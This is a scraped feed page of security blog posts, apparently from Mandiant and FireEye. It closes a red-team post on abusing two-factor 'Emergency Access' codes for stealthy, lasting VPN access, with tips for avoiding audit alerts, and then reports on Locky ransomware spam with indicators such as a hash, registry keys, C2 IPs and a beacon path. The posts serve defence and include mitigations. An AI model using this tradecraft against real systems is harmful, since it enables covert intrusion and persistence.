Restrict users’ abilities to create arbitrary open Windows shares by restricting local administrator permissions. There is almost no reason for real information to be stored in a location where it is accessible to “Everyone” (i.e. any domain user). Use Active Directory Groups to your advantage to define tight access controls where sensitive information may be. Consider implementing a Data Loss Prevention (DLP) solution that maintains encryption of sensitive files and audits their access and modification. You can even take the “Invoke-ShareFinder” script and do a quick self-assessment in a day or two - keep an eye out for shares on web servers or corporate data shares.

6) A Two-Factor Emergency

Many two-factor authentication products offer what are called “Emergency Access” codes, an authentication mechanism designed to allow VPN access after a user has lost their token and remote access is critical. An example screenshot depicting emergency access token code management is shown in Figure 9.

Figure 9: Emergency token code access management screenshot

As the screenshot above shows, the system offers a fixed “second factor” of authentication – perfect for the red team that wants stealthy remote access to the environment. These emergency access codes are particularly dangerous because they can be configured with no expiration date, allowing for a quiet return into the environment at a later date.

A word of caution for eager red teams: while creating your own profile/token using this access is tempting, there is typically more alerting and auditing around the creation of profiles than the modification of existing profiles.

As every vendor solution is different, we’ll leave it as an exercise to the reader to determine the proper method of implementing “Emergency Access” in their target environment. Keep in mind that if you’re using an existing user’s account, emergency access may not always be enough – the PIN is required in addition to the emergency access code. Fortunately, most vendors offer the option to quickly clear the PIN and set a new one, as depicted in Figure 10.


Figure 10: PIN management screenshot

How to prevent this attack

Implement regular two-factor application auditing. Log the user that logs in, the date of the login, where the login originated, and the changes that were made, especially if the changes involved the creation of new user profiles. Enforce policies that disallow emergency token access except in the direst of needs, and even then only allow this access for a short period. We highly recommend you perform a quick audit of all your two-factor authenticated accounts right now – you might be surprised what you find.

Conclusion

There are many attack paths and vectors that veteran red teams can use to bypass “secure” security controls. At Mandiant, our Red Team takes advantage of our front line intelligence, as well as the latest tools, tactics, and procedures we see our adversaries leverage in their own breaches.

Unfortunately, many companies place too much trust in security solutions such as two-factor authentication without taking the necessary steps to secure the underlying technologies. This oversight could allow attackers and red teams alike to subvert two-factor authentication implementations even when they’re implemented properly.

Special thanks to Andrew Burkhardt, Evan Peña, and Justin Prosco for their help with the content of this blog.

Surge in Spam Campaign Delivering Locky Ransomware Downloaders

$
0
0

FireEye Labs is detecting a significant spike in Locky ransomware downloaders due to a pair of concurrent email spam campaigns impacting users in over 50 countries. Some of the top affected countries are depicted in Figure 1.

Figure 1. Affected countries

As seen in Figure 2, the steep spike starts on March 21, 2016, where Locky is running campaigns that coincide with the new Dridex campaigns that were discussed in the blog, “Stop Scanning My Macro”.

Figure 2. Detection on spam delivered malware

Prior to Locky’s emergence in February 2016, Dridex was known to be responsible for a relatively higher volume of email spam campaigns. However, as shown in Figure 3, we can see that Locky is catching up with Dridex’s spam activities. This is especially true for this week, as we are seeing more Locky-related spam themes than Dridex. On top of that, we also are seeing Dridex and Locky running campaigns on the same day, which resulted in an abnormal detection spike.

Figure 3. Dridex versus Locky spam campaign over time

Locky Ransomware spam 

The new Locky spam campaign uses several themes such as “invoice notice”, “attached image”, and “attached document themes”. See Figure 4 and Figure 5 for example campaign emails.

Figure 4. Urgent Invoice Campaign

Figure 5. Other Campaigns

The ZIP attachment as depicted in Figure 6 contains a malicious JavaScript downloader that downloads and installs the Locky ransomware.

Figure 6. Zipped Content

In Figure 7, it is interesting to see that the recent Locky campaign seems to prefer using a JavaScript-based downloader in comparison to Microsoft Word and Excel macro-based downloaders, which were seen being used in its early days.

Figure 7. Locky Downloader Mechanism

The preference for JavaScript downloaders could be due to the ease to transform or obfuscate the script via automation to generate new variants as depicted in Figure 8. As a result, the traditional signature-based solution may not keep up with the variants where its behavioral intent is the same. At the time of discovery, most of the samples that we see are being detected by only one vendor, according to VirusTotal.

Figure 8. Obfuscated JavaScript code

Conclusions

The volume of Locky ransomware downloaders observed is increasing and it may potentially replace the Dridex downloader as the top spammer. One of the latest victims of Locky is Methodist Hospital[1], where the victim was reportedly forced to pay a ransom to retrieve their encrypted data. This suggests that the cybercriminals are earning more from ransomware and this drives their aggressive campaigns.

On top of that, JavaScript downloaders seem to be the preferred medium for delivering its payload as it could be easily obfuscated to create new variants.

Technical Analysis of a Locky Payload Sample

MD5 Sum: 3F118D0B888430AB9F58FC2589207988 (First seen on 2016-02-24 in VirusTotal)

Persistence Mechanism
  • The malware does not contain a persistence mechanism. An external tool or installer is required if the attacker desires persistence.
  • The malware contains the ability to install the following registry key for persistence; this functionality is disabled in this variant.
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Locky
      • <path_to_malware>
File System Artifacts
  • The malware encrypts files on the system and creates new files with the encrypted contents in the same directory with the following naming convention:
    • <system identifier><16 random hex digits>.locky
    • The <system identifier> value is the ASCII hexadecimal representation of the first eight bytes of the MD5 hash of the GUID of the system volume.
  • The malware drops a ransom note provided by the C2 server in all directories with encrypted files and on the desktop of the current user:
    • _Locky_recover_instructions.txt
  • The malware drops an image on the desktop of the current user:
    • _Locky_recover_instructions.bmp
Registry Artifacts
  • The malware creates the registry key HKCU\Software\Locky.
    • id is set to a unique identifier generated for the compromised system.
    • pubkey is set to a binary buffer that contains a public RSA key.
    • paytext is set to a binary buffer containing the recovery instructions.
    • completed is set to 1.
  • The malware changes the desktop background to a bitmap containing the ransom instructions.
    • HKCU\Control Panel\Desktop\Wallpaper is set to: %CSIDL_DESKTOPDIRECTORY%\_Locky_recover_instructions.bmp

Network-Based Signatures

Command and Control (CnC)
  • The malware communicates with the following hard-coded hosts using HTTP over TCP port 80. The malware also uses a domain name generation algorithm as described below.
    • 188.138.88.184
    • 31.41.47.37
    • 5.34.183.136
    • 91.121.97.170
Beacon Packet
  • The malware beacon builds a HTTP POST request to /main.php as shown in Figure 9. The POST data is encoded using a custom algorithm.

Figure 9. HTTP POST request polling packet (general packet structure)

Domain Generation Algorithm (DGA)

This sample contains a domain name generation algorithm that is based on the current month, day and year. There are eight possible domains per day and the domains change on the first of the month and on even numbered days. Figure 10 contains Python code to generate the eight possible domain names for the current date.

 


Figure 10. Locky Domain Generation Algorithm

[1] http://arstechnica.com/security/2016/03/kentucky-hospital-hit-by-ransomware-attack/

 

 

 

 

 

 

 

 

Viewing all 138 articles
Browse latest View live